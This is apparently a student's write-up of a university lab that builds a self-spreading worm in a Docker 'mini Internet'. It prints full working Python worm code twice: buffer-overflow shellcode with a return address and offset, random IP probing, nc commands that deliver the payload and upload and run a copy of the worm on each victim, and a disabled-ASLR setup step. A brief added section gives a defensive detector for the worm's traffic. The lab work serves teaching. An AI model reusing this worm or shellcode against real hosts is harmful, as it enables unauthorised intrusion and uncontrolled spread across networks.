Task 1: Get Familiar with the Lab Setup
In the nano directory and the map directory respectively, run docker-compose build && docker-compose up to set up the lab environment. Errors may appear partway through; run it repeatedly until it succeeds.
Task 2: Attack the First Target
First run the following command:
sudo /sbin/sysctl -w kernel.randomize_va_space=0
A skeleton code is provided in the Labsetup/worm folder. We will complete this code step by step, doing one thing in each task. In this task, we mainly complete the createBadfile() function, which generates the malicious payload for the buffer-overflow attack. We will launch the attack on the first target; any host can be chosen as the first target. In the code, the target 10.151.0.71 is hard-coded (line ➀). Students can change it freely. In later tasks, we will generate the target IP address instead of hard-coding it.
4.1 The Skeleton Code
#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD"
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines.
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line.
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)'; "
   " ping -q 1.2.3.4; "
   " *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')

# Create the badfile (the malicious payload)
def createBadfile():
    content = bytearray(0x90 for i in range(500))
    ##################################################################
    # Put the shellcode at the end
    content[500-len(shellcode):] = shellcode

    ret = 0xffffd608 # Need to change
    offset = 116 # Need to change

    content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
    ##################################################################

    # Save the binary code to file
    with open('badfile', 'wb') as f:
        f.write(content)

# Find the next victim (return an IP address).
# Check to make sure that the target is alive.
def getNextTarget():
    return '10.151.0.71'

###############################################################
print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)

    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

    # Remove this line if you want to continue attacking others
    exit(0)
4.2 Creating the badfile
On any container or on the host, run:
echo hello | nc -w2 10.151.0.71 9090
In the dcup (docker-compose up) console you can see the server's feedback (this lowers the difficulty of exploiting the buffer overflow).

ret = 0xffffd608 # Need to change
offset = 116 # Need to change

These two values are derived from that feedback: ret = ebp + 16, and offset = ebp - buffer address + 4 = 116.
4.3 The Shellcode
From any container, send the badfile:
cat badfile | nc 10.151.0.71 9090
The malicious code can be seen to have executed successfully.
The container can be restarted with the following command:
docker restart <container ID>
Task 3: Self Duplication
The shellcode makes the target machine open port 8080 to receive a file:
" echo '(^_^) Shellcode is running (^_^)'; "
" nc -nvl 8080 > /tmp/worm.py "
" *"
"123456789012345678901234567890123456789012345678901234567890"
The following loop body is responsible for sending the worm to the target machine, completing the transfer of the worm file:

while True:
    # Give the shellcode some time to run on the target host
    time.sleep(1)
    # Send the worm file to the target machine, completing the replication
    subprocess.run([f"cat worm.py | nc -w3 {targetIP} 8080"], shell=True)
    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

The file transfer can be seen to succeed.
Task 4: Propagation
Following the lecture slides, getNextTarget() picks random addresses and pings each one until a live host is found:

def getNextTarget():
    while True:
        x = randint(151, 155)
        y = randint(70, 80)
        ip = f'10.{x}.0.{y}'
        output = subprocess.check_output(f"ping -q -c1 -W1 {ip}",shell=True)
        result = output.find(b'1 received')
        if result == -1 :
            print(f"{ip} is not alive", flush = True)
        else:
            print(f"{ip} is alive,attack start", flush =True)
            return ip
After completing the worm program, demonstrate it.
Execution raised an error:
subprocess.CalledProcessError: Command 'ping -q -c1 -W1 10.151.0.76' returned non-zero exit status 1.
Use try/except to keep the program from stopping.
Because the ping timings differ, the hosts do not flash at the same moment, but the process count reached 450, more than 200 above the normal 200-odd, which shows that worm.py is running on every Docker container.
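From the defender's side, the propagation behaviour described in Task 3 and Task 4 leaves a recognisable network footprint: one source pinging many random addresses in a short time, followed by a TCP connection to port 9090 (the vulnerable server) and then one to port 8080 (the nc listener that receives worm.py) between the same pair of hosts. The following analyser is an added example, not part of this writeup or of the SEED lab code; the log format, the sample log lines and the thresholds are all constructed for the example.

```python
# Added example (not from the lab writeup or the SEED lab): flag the two
# network behaviours the worm exhibits from a constructed connection log.
#   1. ping sweep: one source sends ICMP echo requests to many distinct
#      destinations inside a short window (the random probing in getNextTarget);
#   2. exploit-then-upload: a TCP connection to port 9090 followed shortly by
#      one to port 8080 between the same source and destination.
# Log format (constructed for this example): "<epoch> <proto> <src> <dst> <dport>",
# with dport "-" for ICMP. Thresholds below are assumptions, not lab values.
import re
from collections import defaultdict

SWEEP_WINDOW = 60      # seconds (assumed)
SWEEP_THRESHOLD = 5    # distinct ICMP destinations within the window (assumed)
UPLOAD_WINDOW = 30     # seconds allowed between the 9090 hit and the 8080 hit (assumed)

LINE_RE = re.compile(r"^(\d+)\s+(ICMP|TCP)\s+(\S+)\s+(\S+)\s+(\S+)$")

# Constructed sample log: 10.151.0.71 sweeps six hosts, exploits 10.152.0.73
# and uploads to it; 10.160.0.5 is ordinary traffic; the last line is noise.
SAMPLE_LOG = """\
1000 ICMP 10.151.0.71 10.152.0.74 -
1001 ICMP 10.151.0.71 10.153.0.78 -
1002 ICMP 10.151.0.71 10.151.0.79 -
1003 ICMP 10.151.0.71 10.154.0.72 -
1004 ICMP 10.151.0.71 10.155.0.76 -
1005 ICMP 10.151.0.71 10.152.0.73 -
1006 TCP 10.151.0.71 10.152.0.73 9090
1008 TCP 10.151.0.71 10.152.0.73 8080
1100 ICMP 10.160.0.5 10.160.0.6 -
1101 TCP 10.160.0.5 10.160.0.6 443
bogus line
"""

def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, proto, src, dst, dport = m.groups()
    return {"ts": int(ts), "proto": proto, "src": src, "dst": dst,
            "dport": None if dport == "-" else int(dport)}

def find_ping_sweeps(events):
    """Return {src: set_of_destinations} for every source that pings at least
    SWEEP_THRESHOLD distinct hosts inside some SWEEP_WINDOW-second window."""
    probes_by_src = defaultdict(list)
    for e in events:
        if e["proto"] == "ICMP":
            probes_by_src[e["src"]].append((e["ts"], e["dst"]))
    hits = {}
    for src, probes in probes_by_src.items():
        probes.sort()  # chronological, so every later probe has t >= t0
        for i, (t0, _) in enumerate(probes):
            window = {d for t, d in probes[i:] if t - t0 <= SWEEP_WINDOW}
            if len(window) >= SWEEP_THRESHOLD:
                hits[src] = window
                break
    return hits

def find_exploit_then_upload(events):
    """Return (src, dst) pairs where a connection to 9090 is followed within
    UPLOAD_WINDOW seconds by a connection to 8080 from the same src to the same dst."""
    last_9090 = {}
    pairs = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["proto"] != "TCP":
            continue
        key = (e["src"], e["dst"])
        if e["dport"] == 9090:
            last_9090[key] = e["ts"]
        elif e["dport"] == 8080 and key in last_9090:
            if 0 <= e["ts"] - last_9090[key] <= UPLOAD_WINDOW:
                pairs.append(key)
                del last_9090[key]
    return pairs

def analyze(log_text):
    """Run both detectors over a log and return their findings."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    return {"sweeps": find_ping_sweeps(events),
            "uploads": find_exploit_then_upload(events)}

if __name__ == "__main__":
    findings = analyze(SAMPLE_LOG)
    for src, dsts in findings["sweeps"].items():
        print(f"ping sweep from {src}: {len(dsts)} hosts probed")
    for src, dst in findings["uploads"]:
        print(f"exploit-then-upload pattern: {src} -> {dst} (9090 then 8080)")
```

Either detector alone is weak on its own (a monitoring host also pings many machines, and 9090/8080 are arbitrary ports in this lab); combining them, as the worm forces both behaviours, gives a much lower false-positive rate. On the lab network the same logic could be fed from iptables LOG output or a netcat/socat connection log, after adapting the parser to that format.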
Task 5: Preventing Self Infection
To prevent repeated infection on one machine, my approach is to create an "exist" file indicating that the program has already run.
Add the following code before the program:

if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)
The process count now stabilizes, meaning no duplicate copies of the program are running.
Task 6: Releasing the Worm on the Mini Internet
dcbuild
./z_start.sh
Bring up the environment with the two commands above, then run the completed worm:
#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint

# You can use this shellcode to run any command you want
shellcode= (
   "\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
   "\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
   "\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
   "\xff\xff\xff"
   "AAAABBBBCCCCDDDD"
   "/bin/bash*"
   "-c*"
   # You can put your commands in the following three lines.
   # Separating the commands using semicolons.
   # Make sure you don't change the length of each line.
   # The * in the 3rd line will be replaced by a binary zero.
   " echo '(^_^) Shellcode is running (^_^)'; "
   " nc -nvl 8080 > /tmp/worm.py; "
   " python3 /tmp/worm.py *"
   "123456789012345678901234567890123456789012345678901234567890"
   # The last line (above) serves as a ruler, it is not used
).encode('latin-1')

# Task 5: exit if this host has already been infected
if os.path.exists("/tmp/exist.txt"):
    print("exist")
    sys.exit(0)
else:
    with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
        print(f)

# Create the badfile (the malicious payload)
def createBadfile():
    content = bytearray(0x90 for i in range(500))
    ##################################################################
    # Put the shellcode at the end
    content[500-len(shellcode):] = shellcode

    ret = 0xffffd608 # Need to change
    offset = 116 # Need to change

    content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
    ##################################################################

    # Save the binary code to file
    with open('badfile', 'wb') as f:
        f.write(content)

# Find the next victim (return an IP address).
# Check to make sure that the target is alive.
def getNextTarget():
    while True:
        x = randint(151, 180)
        y = randint(70, 100)
        ip = f'10.{x}.0.{y}'
        try:
            output = subprocess.check_output(f"ping -q -c1 -W1 {ip}", shell=True)
            result = output.find(b'1 received')
            if result == -1 :
                print(f"{ip} is not alive", flush = True)
            else:
                print(f"{ip} is alive,attack start", flush =True)
                return ip
        except subprocess.CalledProcessError as e:
            # ping exits non-zero for an unreachable host; keep probing
            print(e)

###############################################################
print("The worm has arrived on this host ^_^", flush=True)

# This is for visualization. It sends an ICMP echo message to
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)

# Create the badfile
createBadfile()

# Launch the attack on other servers
while True:
    targetIP = getNextTarget()

    # Send the malicious payload to the target host
    print(f"**********************************", flush=True)
    print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
    print(f"**********************************", flush=True)
    subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)

    # Give the shellcode some time to run on the target host
    time.sleep(1)

    # Send the worm file to the target machine, completing the replication
    subprocess.run([f"cat worm.py | nc -w5 {targetIP} 8080"], shell=True)

    # Sleep for 10 seconds before attacking another host
    time.sleep(10)

    # Remove this line if you want to continue attacking others
The machine has only 2 GB of memory, so the run got stuck partway through. qaq
But the program is definitely fine!